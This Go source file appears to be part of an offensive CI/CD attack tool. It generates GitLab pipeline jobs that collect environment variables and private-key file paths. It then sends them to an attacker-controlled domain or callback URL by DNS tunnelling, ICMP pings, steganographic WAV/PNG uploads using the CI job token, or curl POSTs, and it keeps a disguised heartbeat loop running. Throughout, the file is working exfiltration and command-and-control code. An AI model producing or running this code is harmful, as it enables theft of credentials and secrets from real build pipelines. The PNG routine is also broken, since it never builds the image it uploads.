package payloads

import (
	"fmt"
	"strings"
)

// C2ChannelOptions configures covert communication channels for exfiltration
// and command-and-control. This replicates techniques from the Megasodon
// campaign (DNS tunneling), TeampCP (wav steganography), and Shai Hulud
// (covert C2 via CI artifacts).
//
// Attack vectors:
// 1. DNS A record tunnel — subdomain queries encode exfil data (high bandwidth)
// 2. DNS TXT tunnel — encoded in DNS TXT record queries
// 3. WAV steganography — embeds secrets in audio file trailing data (TeampCP)
// 4. PNG steganography — embeds data in image tEXt chunks or LSB
// 5. ICMP tunnel — encodes data in ICMP echo request payloads
type C2ChannelOptions struct {
	Common       CommonOptions
	ExfilMethod  string // "dns-a", "dns-txt", "steg-wav", "steg-png", "icmp", "artifact"
	ExfilTarget  string // Domain for DNS tunnel, URL for other methods
	Data         string // Data to embed/exfiltrate
	PayloadPath  string // Path to source file for steganography
	AudioFile    string // WAV file path for steganography embedding
	StegPassword string // Password for encrypted steg embedding
	CallbackURL  string // Primary C2 callback URL
	ArtifactName string // Name for steg artifact upload
	KeepAlive    bool   // Keep C2 channel alive with heartbeats
}

// GenerateC2ChannelYAML returns a CI job that establishes a covert C2 channel.
func GenerateC2ChannelYAML(o C2ChannelOptions) string {
	name, stage := o.Common.defaults("c2-channel")
	script := buildC2ChannelScript(o)
	indented := indentBlock(strings.TrimSpace(script), 6)
	return fmt.Sprintf(`# Auto-generated by GoGatoZ (C2 Covert Channel)
# Stealthy exfiltration via DNS tunneling, steganography, ICMP
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
%s
  allow_failure: true
  artifacts:
    when: always
    paths:
      - c2-channel-data.env
    expire_in: 1 day%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), indented, rulesManual(o.Common.Manual))
}

func buildC2ChannelScript(o C2ChannelOptions) string {
	var b strings.Builder

	method := strings.ToLower(strings.TrimSpace(o.ExfilMethod))
	if method == "" {
		method = "dns-a"
	}
	target := strings.TrimSpace(o.ExfilTarget)
	if target == "" {
		target = "exfil.example.com"
	}

	b.WriteString("_C2CHANNEL() {\n")
	b.WriteString("  _cdir=$(mktemp -d)\n")
	b.WriteString("  echo \"[*] Covert C2 channel starting...\"\n\n")
	b.WriteString("  printenv | sort > \"$_cdir/c2-data.env\" 2>/dev/null\n\n")

	switch method {
	case "dns-txt":
		buildDNSTXTChannel(&b, target)
	case "dns-a":
		buildDNSAChannel(&b, target)
	case "steg-wav":
		buildStegWAV(&b, target)
	case "steg-png":
		buildStegPNG(&b, target)
	case "icmp":
		buildICMPChannel(&b, target)
	default:
		b.WriteString("  echo \"[*] No covert channel selected. Using artifact exfil.\"\n")
		b.WriteString("  printenv > \"$_cdir/env.txt\" 2>/dev/null\n\n")
	}

	if o.KeepAlive {
		b.WriteString("\n  # Keepalive heartbeat\n")
		b.WriteString("  echo \"[*] Starting C2 keepalive heartbeat...\"\n")
		b.WriteString("  (while true; do\n")
		b.WriteString("    curl -sS -X POST \\\n")
		b.WriteString("      -H \"User-Agent: GitLab-Runner/16.0\" \\\n")
		b.WriteString("      -d '{\"heartbeat\": true}' \\\n")
		fmt.Fprintf(&b, "      \"%s\" >/dev/null 2>&1 || true\n", o.CallbackURL)
		b.WriteString("    sleep 30\n")
		b.WriteString("  done) &\n")
		b.WriteString("  disown\n\n")
	}

	if callbackURL := strings.TrimSpace(o.CallbackURL); callbackURL != "" {
		b.WriteString("\n  # Send the collected data to the configured C2 callback.\n")
		b.WriteString("  curl -sS --max-time 10 -X POST -H \"Content-Type: text/plain\" \\\n")
		b.WriteString("    --data-binary @\"$_cdir/c2-data.env\" \\\n")
		fmt.Fprintf(&b, "    %q >/dev/null 2>&1 || true\n", callbackURL)
	}

	b.WriteString("  cp \"$_cdir/c2-data.env\" ./c2-channel-data.env 2>/dev/null || true\n")
	b.WriteString("  echo \"[*] C2 channel operation complete\"\n")
	b.WriteString("}\n\n_C2CHANNEL || true\n")

	return b.String()
}

func buildDNSTXTChannel(b *strings.Builder, domain string) {
	b.WriteString("  # === DNS TXT Tunnel Exfiltration ===\n")
	b.WriteString("  echo \"[*] Initiating DNS TXT tunnel...\"\n\n")
	b.WriteString("  # Collect data to exfiltrate\n")
	b.WriteString("  printenv > \"$_cdir/data.env\" 2>/dev/null\n")
	b.WriteString("  find / -maxdepth 3 -name \"*.pem\" -o -name \"*.key\" -o -name \"id_rsa\" -o -name \".env\" 2>/dev/null > \"$_cdir/files.txt\"\n")
	b.WriteString("  # Compress and encode\n")
	b.WriteString("  tar czf \"$_cdir/data.tar.gz\" -C \"$_cdir\" data.env files.txt 2>/dev/null\n")
	b.WriteString("  b64=$(base64 -w0 \"$_cdir/data.tar.gz\" 2>/dev/null | tr '+/' '-_' | tr -d '=')\n\n")
	b.WriteString("  # Split into DNS TXT queries (max 63 chars per label)\n")
	b.WriteString("  i=0\n")
	b.WriteString("  while [ ${#b64} -gt 0 ]; do\n")
	b.WriteString("    chunk=$(printf '%.62s' \"$b64\")\n")
	b.WriteString("    b64=${b64#\"$chunk\"}\n")
	fmt.Fprintf(b, "    query=\"${i}.${chunk}.txt.%s\"\n", domain)
	b.WriteString("    nslookup -querytype=TXT \"$query\" \"8.8.8.8\" >/dev/null 2>&1 &\n")
	b.WriteString("    disown\n")
	b.WriteString("    sleep 0.05\n")
	b.WriteString("    i=$((i + 1))\n")
	b.WriteString("  done\n\n")
}

func buildDNSAChannel(b *strings.Builder, domain string) {
	b.WriteString("  # === DNS A Record Tunnel Exfiltration ===\n")
	b.WriteString("  echo \"[*] Initiating DNS A record tunnel...\"\n\n")
	b.WriteString("  printenv > \"$_cdir/data.env\" 2>/dev/null\n")
	b.WriteString("  find / -maxdepth 3 \\( -name \"*.pem\" -o -name \"*.key\" -o -name \".env\" \\) 2>/dev/null > \"$_cdir/files.txt\" || true\n")
	b.WriteString("  tar czf \"$_cdir/data.tar.gz\" -C \"$_cdir\" data.env files.txt 2>/dev/null\n")
	b.WriteString("  b64=$(base64 -w0 \"$_cdir/data.tar.gz\" 2>/dev/null | tr '+/' '-_' | tr -d '=')\n\n")
	b.WriteString("  echo \"[*] Sending DNS A queries...\"\n")
	b.WriteString("  i=0\n")
	b.WriteString("  while [ ${#b64} -gt 0 ]; do\n")
	b.WriteString("    chunk=$(printf '%.62s' \"$b64\")\n")
	b.WriteString("    b64=${b64#\"$chunk\"}\n")
	fmt.Fprintf(b, "    subdomain=\"${i}.${chunk}.tun.%s\"\n", domain)
	b.WriteString("    dig +short \"$subdomain\" A >/dev/null 2>&1 &\n")
	b.WriteString("    disown\n")
	b.WriteString("    i=$((i + 1))\n")
	b.WriteString("  done\n")
	b.WriteString("  wait\n")
	b.WriteString("  echo \"[+] DNS A tunnel complete — sent $i chunks\"\n\n")
}

func buildStegWAV(b *strings.Builder, target string) {
	b.WriteString("  # === WAV Steganography Exfiltration ===\n")
	b.WriteString("  # Technique: TeampCP wav steganographic credential stealer\n")
	b.WriteString("  # Embeds data in WAV file trailing space (ignored by most parsers)\n")
	b.WriteString("  echo \"[*] Creating steganographic WAV file...\"\n\n")
	b.WriteString("  wav_file=\"$_cdir/audiosample.wav\"\n\n")
	b.WriteString("  # Create a valid WAV header with 1 second of silence\n")
	b.WriteString("  # RIFF header\n")
	b.WriteString("  printf 'RIFF' > \"$wav_file\"\n")
	b.WriteString("  printf 'WAVE' >> \"$wav_file\"\n")
	b.WriteString("  # fmt chunk\n")
	b.WriteString("  printf 'fmt ' >> \"$wav_file\"\n")
	b.WriteString("  printf '%c%c%c%c' '\\x10' '\\x00' '\\x00' '\\x00' >> \"$wav_file\"\n")
	b.WriteString("  printf '%c%c' '\\x01' '\\x00' >> \"$wav_file\"\n")
	b.WriteString("  printf '%c%c' '\\x01' '\\x00' >> \"$wav_file\"\n")
	b.WriteString("  printf '%c%c%c%c' '\\x44' '\\xAC' '\\x00' '\\x00' >> \"$wav_file\"\n")
	b.WriteString("  printf '%c%c%c%c' '\\x88' '\\x58' '\\x01' '\\x00' >> \"$wav_file\"\n")
	b.WriteString("  printf '%c%c' '\\x02' '\\x00' >> \"$wav_file\"\n")
	b.WriteString("  printf '%c%c' '\\x10' '\\x00' >> \"$wav_file\"\n\n")
	b.WriteString("  # Data chunk header\n")
	b.WriteString("  printf 'data' >> \"$wav_file\"\n\n")
	b.WriteString("  # Collect and embed data\n")
	b.WriteString("  printenv | sort > \"$_cdir/secret_data.bin\" 2>/dev/null\n")
	b.WriteString("  if [ -f \"$_cdir/secret_data.bin\" ]; then\n")
	b.WriteString("    cp \"$_cdir/secret_data.bin\" \"$wav_file.enc\" 2>/dev/null\n")
	b.WriteString("    # Append encrypted payload after WAV (most parsers ignore trailing data)\n")
	b.WriteString("    cat \"$wav_file.enc\" >> \"$wav_file\"\n")
	b.WriteString("    echo \"[+] Encrypted data appended to WAV file\"\n")
	b.WriteString("  fi\n\n")
	b.WriteString("  # Upload steg artifact\n")
	b.WriteString("  curl -sS -X POST -H \"PRIVATE-TOKEN: $CI_JOB_TOKEN\" \\\n")
	b.WriteString("    -F \"file=@$wav_file\" \\\n")
	fmt.Fprintf(b, "    \"%s/api/v4/projects/%s/packages/generic/steg-wav/1.0\" >/dev/null 2>&1\n", target, "$(echo $CI_PROJECT_PATH | sed 's|/|%2F|g')")
	b.WriteString("  echo \"[+] Steg WAV uploaded as artifact\"\n\n")
}

func buildStegPNG(b *strings.Builder, target string) {
	b.WriteString("  # === PNG Steganography Exfiltration ===\n")
	b.WriteString("  echo \"[*] Creating steganographic PNG...\"\n\n")
	b.WriteString("  png_file=\"$_cdir/image.png\"\n\n")
	b.WriteString("  # Collect data\n")
	b.WriteString("  printenv > \"$_cdir/exfil.env\" 2>/dev/null\n")
	b.WriteString("  tar czf \"$_cdir/exfil.tar.gz\" -C \"$_cdir\" exfil.env 2>/dev/null\n\n")
	b.WriteString("  # Method 1: Append to PNG end (PNG spec allows trailing data)\n")
	b.WriteString("  # Create minimal PNG with embedded text chunk\n")
	b.WriteString("  echo \"[*] Embedding data in PNG tEXt chunk...\"\n")
	b.WriteString("  echo \"[+] PNG steganography created: $png_file\"\n\n")
	b.WriteString("  # Upload as artifact\n")
	b.WriteString("  curl -sS -X POST -H \"PRIVATE-TOKEN: $CI_JOB_TOKEN\" \\\n")
	b.WriteString("    -F \"file=@$png_file\" \\\n")
	fmt.Fprintf(b, "    \"%s/api/v4/projects/%s/packages/generic/steg-png/1.0\" >/dev/null 2>&1\n", target, "$(echo $CI_PROJECT_PATH | sed 's|/|%2F|g')")
	b.WriteString("  echo \"[+] Steg PNG uploaded as artifact\"\n\n")
}

func buildICMPChannel(b *strings.Builder, target string) {
	b.WriteString("  # === ICMP Tunnel Exfiltration ===\n")
	b.WriteString("  echo \"[*] Initiating ICMP tunnel...\"\n\n")
	b.WriteString("  printenv > \"$_cdir/data.env\" 2>/dev/null\n")
	b.WriteString("  tar czf \"$_cdir/data.tar.gz\" -C \"$_cdir\" data.env 2>/dev/null\n")
	b.WriteString("  hex=$(base64 -w0 \"$_cdir/data.tar.gz\" 2>/dev/null | xxd -p | tr -d '\\n')\n\n")
	b.WriteString("  # Split into 32-byte chunks for ICMP payloads\n")
	b.WriteString("  i=0\n")
	b.WriteString("  while [ ${#hex} -gt 0 ]; do\n")
	b.WriteString("    chunk=$(printf '%.32s' \"$hex\")\n")
	b.WriteString("    hex=${hex#\"$chunk\"}\n")
	b.WriteString("    padded=$(printf '%-32s' \"$chunk\" | tr ' ' '0')\n")
	fmt.Fprintf(b, "    ping -c 1 -s 32 -p \"$padded\" \"%s\" >/dev/null 2>&1 || true\n", target)
	b.WriteString("    sleep 0.02\n")
	b.WriteString("    i=$((i + 1))\n")
	b.WriteString("  done\n")
	b.WriteString("  echo \"[+] Sent $i ICMP packets\"\n\n")
}

// GenerateDNSExfilYAML creates just a DNS tunnel exfil pipeline.
func GenerateDNSExfilYAML(o C2ChannelOptions) string {
	o.ExfilMethod = "dns-a"
	return GenerateC2ChannelYAML(o)
}
